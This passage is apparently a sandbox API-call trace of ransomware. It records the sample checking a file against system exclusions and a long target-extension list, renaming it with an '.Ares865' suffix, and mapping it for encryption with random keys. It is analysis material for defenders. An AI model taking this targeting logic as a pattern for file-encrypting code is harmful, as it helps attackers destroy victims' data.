lpString2="bootmgr") returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0073.679] lstrlenW (lpString="cab1.cab") returned 8 [0073.679] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0073.679] lstrcpyW (in: lpString1=0x2cce4e6, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0073.679] lstrlenW (lpString="cab1.cab") returned 8 [0073.679] lstrlenW (lpString="Ares865") returned 7 [0073.679] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0073.679] lstrlenW (lpString=".dll") returned 4 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0073.679] lstrlenW (lpString=".lnk") returned 4 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0073.679] lstrlenW (lpString=".ini") returned 4 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0073.679] lstrlenW (lpString=".sys") returned 4 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0073.680] lstrlenW (lpString="cab1.cab") returned 8 [0073.680] lstrlenW (lpString="bak") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0073.680] lstrlenW (lpString="ba_") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0073.680] lstrlenW (lpString="dbb") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0073.680] lstrlenW (lpString="vmdk") returned 4 [0073.680] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0073.680] lstrlenW (lpString="rar") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0073.680] lstrlenW (lpString="zip") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0073.680] lstrlenW (lpString="tgz") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0073.680] lstrlenW (lpString="vbox") returned 4 [0073.680] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0073.680] lstrlenW (lpString="vdi") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0073.680] lstrlenW (lpString="vhd") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0073.680] lstrlenW (lpString="vhdx") returned 4 [0073.680] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0073.680] lstrlenW (lpString="avhd") returned 4 [0073.680] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0073.680] lstrlenW (lpString="db") returned 2 [0073.680] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0073.680] lstrlenW (lpString="db2") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0073.680] lstrlenW (lpString="db3") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0073.680] lstrlenW (lpString="dbf") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0073.680] lstrlenW (lpString="mdf") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0073.680] lstrlenW (lpString="mdb") returned 3 [0073.680] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0073.680] lstrlenW (lpString="sql") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0073.681] lstrlenW (lpString="sqlite") returned 6 [0073.681] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0073.681] lstrlenW (lpString="sqlite3") returned 7 [0073.681] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0073.681] lstrlenW (lpString="sqlitedb") returned 8 [0073.681] lstrlenW (lpString="xml") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0073.681] lstrlenW (lpString="$er") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0073.681] lstrlenW (lpString="4dd") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0073.681] lstrlenW (lpString="4dl") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0073.681] lstrlenW (lpString="^^^") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0073.681] lstrlenW (lpString="abs") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0073.681] lstrlenW (lpString="abx") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0073.681] lstrlenW (lpString="accdb") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0073.681] lstrlenW (lpString="accdc") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0073.681] lstrlenW (lpString="accde") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0073.681] lstrlenW (lpString="accdr") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0073.681] lstrlenW (lpString="accdt") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0073.681] lstrlenW (lpString="accdw") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0073.681] lstrlenW (lpString="accft") returned 5 [0073.681] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0073.681] lstrlenW (lpString="adb") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0073.681] lstrlenW (lpString="adb") returned 3 [0073.681] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0073.682] lstrlenW (lpString="ade") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0073.682] lstrlenW (lpString="adf") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0073.682] lstrlenW (lpString="adn") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0073.682] lstrlenW (lpString="adp") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0073.682] lstrlenW (lpString="alf") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0073.682] lstrlenW (lpString="ask") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0073.682] lstrlenW (lpString="btr") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0073.682] lstrlenW (lpString="cat") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0073.682] lstrlenW (lpString="cdb") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0073.682] lstrlenW (lpString="ckp") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0073.682] lstrlenW (lpString="cma") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0073.682] lstrlenW (lpString="cpd") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0073.682] lstrlenW (lpString="dacpac") returned 6 [0073.682] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0073.682] lstrlenW (lpString="dad") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0073.682] lstrlenW (lpString="dadiagrams") returned 10 [0073.682] lstrlenW (lpString="daschema") returned 8 [0073.682] lstrlenW (lpString="db-journal") returned 10 [0073.682] lstrlenW (lpString="db-shm") returned 6 [0073.682] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0073.682] lstrlenW (lpString="db-wal") returned 6 [0073.682] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0073.682] lstrlenW (lpString="dbc") returned 3 [0073.682] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0073.682] lstrlenW (lpString="dbs") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0073.683] lstrlenW (lpString="dbt") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0073.683] lstrlenW (lpString="dbv") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0073.683] lstrlenW (lpString="dbx") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0073.683] lstrlenW (lpString="dcb") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0073.683] lstrlenW (lpString="dct") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0073.683] lstrlenW (lpString="dcx") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0073.683] lstrlenW (lpString="ddl") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0073.683] lstrlenW (lpString="dlis") returned 4 [0073.683] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0073.683] lstrlenW (lpString="dp1") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0073.683] lstrlenW (lpString="dqy") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0073.683] lstrlenW (lpString="dsk") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0073.683] lstrlenW (lpString="dsn") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0073.683] lstrlenW (lpString="dtsx") returned 4 [0073.683] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0073.683] lstrlenW (lpString="dxl") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0073.683] lstrlenW (lpString="eco") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0073.683] lstrlenW (lpString="ecx") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0073.683] lstrlenW (lpString="edb") returned 3 [0073.683] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0073.683] lstrlenW (lpString="epim") returned 4 [0073.683] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0073.683] lstrlenW (lpString="fcd") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0073.684] lstrlenW (lpString="fdb") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0073.684] lstrlenW (lpString="fic") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0073.684] lstrlenW (lpString="flexolibrary") returned 12 [0073.684] lstrlenW (lpString="fm5") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0073.684] lstrlenW (lpString="fmp") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0073.684] lstrlenW (lpString="fmp12") returned 5 [0073.684] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0073.684] lstrlenW (lpString="fmpsl") returned 5 [0073.684] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0073.684] lstrlenW (lpString="fol") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0073.684] lstrlenW (lpString="fp3") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0073.684] lstrlenW (lpString="fp4") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0073.684] lstrlenW (lpString="fp5") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0073.684] lstrlenW (lpString="fp7") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0073.684] lstrlenW (lpString="fpt") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0073.684] lstrlenW (lpString="frm") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0073.684] lstrlenW (lpString="gdb") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0073.684] lstrlenW (lpString="gdb") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0073.684] lstrlenW (lpString="grdb") returned 4 [0073.684] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0073.684] lstrlenW (lpString="gwi") returned 3 [0073.684] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0073.684] lstrlenW (lpString="hdb") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0073.685] lstrlenW (lpString="his") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0073.685] lstrlenW (lpString="ib") returned 2 [0073.685] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0073.685] lstrlenW (lpString="idb") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0073.685] lstrlenW (lpString="ihx") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0073.685] lstrlenW (lpString="itdb") returned 4 [0073.685] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0073.685] lstrlenW (lpString="itw") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0073.685] lstrlenW (lpString="jet") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0073.685] lstrlenW (lpString="jtx") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0073.685] lstrlenW (lpString="kdb") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0073.685] lstrlenW (lpString="kexi") returned 4 [0073.685] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0073.685] lstrlenW (lpString="kexic") returned 5 [0073.685] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0073.685] lstrlenW (lpString="kexis") returned 5 [0073.685] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0073.685] lstrlenW (lpString="lgc") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0073.685] lstrlenW (lpString="lwx") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0073.685] lstrlenW (lpString="maf") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0073.685] lstrlenW (lpString="maq") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0073.685] lstrlenW (lpString="mar") returned 3 [0073.685] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0073.685] lstrlenW (lpString="marshal") returned 7 [0073.685] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0073.685] lstrlenW (lpString="mas") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0073.686] lstrlenW (lpString="mav") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0073.686] lstrlenW (lpString="maw") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0073.686] lstrlenW (lpString="mdbhtml") returned 7 [0073.686] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0073.686] lstrlenW (lpString="mdn") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0073.686] lstrlenW (lpString="mdt") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0073.686] lstrlenW (lpString="mfd") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0073.686] lstrlenW (lpString="mpd") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0073.686] lstrlenW (lpString="mrg") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0073.686] lstrlenW (lpString="mud") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0073.686] lstrlenW (lpString="mwb") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0073.686] lstrlenW (lpString="myd") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0073.686] lstrlenW (lpString="ndf") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0073.686] lstrlenW (lpString="nnt") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0073.686] lstrlenW (lpString="nrmlib") returned 6 [0073.686] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0073.686] lstrlenW (lpString="ns2") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0073.686] lstrlenW (lpString="ns3") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0073.686] lstrlenW (lpString="ns4") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0073.686] lstrlenW (lpString="nsf") returned 3 [0073.686] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0073.686] lstrlenW (lpString="nv") returned 2 [0073.687] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0073.687] lstrlenW (lpString="nv2") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0073.687] lstrlenW (lpString="nwdb") returned 4 [0073.687] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0073.687] lstrlenW (lpString="nyf") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0073.687] lstrlenW (lpString="odb") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0073.687] lstrlenW (lpString="odb") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0073.687] lstrlenW (lpString="oqy") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0073.687] lstrlenW (lpString="ora") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0073.687] lstrlenW (lpString="orx") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0073.687] lstrlenW (lpString="owc") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0073.687] lstrlenW (lpString="p96") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0073.687] lstrlenW (lpString="p97") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0073.687] lstrlenW (lpString="pan") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0073.687] lstrlenW (lpString="pdb") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0073.687] lstrlenW (lpString="pdm") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0073.687] lstrlenW (lpString="pnz") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0073.687] lstrlenW (lpString="qry") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0073.687] lstrlenW (lpString="qvd") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0073.687] lstrlenW (lpString="rbf") returned 3 [0073.687] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0073.687] lstrlenW (lpString="rctd") returned 4 [0073.688] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0073.688] lstrlenW (lpString="rod") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0073.688] lstrlenW (lpString="rodx") returned 4 [0073.688] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0073.688] lstrlenW (lpString="rpd") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0073.688] lstrlenW (lpString="rsd") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0073.688] lstrlenW (lpString="sas7bdat") returned 8 [0073.688] lstrlenW (lpString="sbf") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0073.688] lstrlenW (lpString="scx") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0073.688] lstrlenW (lpString="sdb") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0073.688] lstrlenW (lpString="sdc") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0073.688] lstrlenW (lpString="sdf") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0073.688] lstrlenW (lpString="sis") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0073.688] lstrlenW (lpString="spq") returned 3 [0073.688] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0073.688] lstrlenW (lpString="te") returned 2 [0073.688] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0073.688] lstrlenW (lpString="teacher") returned 7 [0073.688] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0073.688] lstrlenW (lpString="tmd") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0073.689] lstrlenW (lpString="tps") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0073.689] lstrlenW (lpString="trc") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0073.689] lstrlenW (lpString="trc") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0073.689] lstrlenW (lpString="trm") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0073.689] lstrlenW (lpString="udb") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0073.689] lstrlenW (lpString="udl") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0073.689] lstrlenW (lpString="usr") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0073.689] lstrlenW (lpString="v12") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0073.689] lstrlenW (lpString="vis") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0073.689] lstrlenW (lpString="vpd") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0073.689] lstrlenW (lpString="vvv") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0073.689] lstrlenW (lpString="wdb") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0073.689] lstrlenW (lpString="wmdb") returned 4 [0073.689] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0073.689] lstrlenW (lpString="wrk") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0073.689] lstrlenW (lpString="xdb") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0073.689] lstrlenW (lpString="xld") returned 3 [0073.689] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0073.689] lstrlenW (lpString="xmlff") returned 5 [0073.689] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0073.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865") returned 131 [0073.690] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0073.690] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0073.691] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=809765) returned 1 [0073.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0073.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0073.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0073.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0073.692] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0073.692] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.692] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5e30, lpName=0x0) returned 0x12c [0073.694] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc5e30) returned 0x2e30000 [0074.153] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0074.153] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.153] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0074.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.153] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.153] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9fb0 [0074.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9fb0 | out: hHeap=0x2b0000) returned 1 [0074.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.154] UnmapViewOfFile (lpBaseAddress=0x2e30000) returned 1 [0074.163] CloseHandle (hObject=0x12c) returned 1 [0074.164] CloseHandle (hObject=0x120) returned 1 [0074.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0074.169] HeapFree (in: hHeap=0x2b0000, 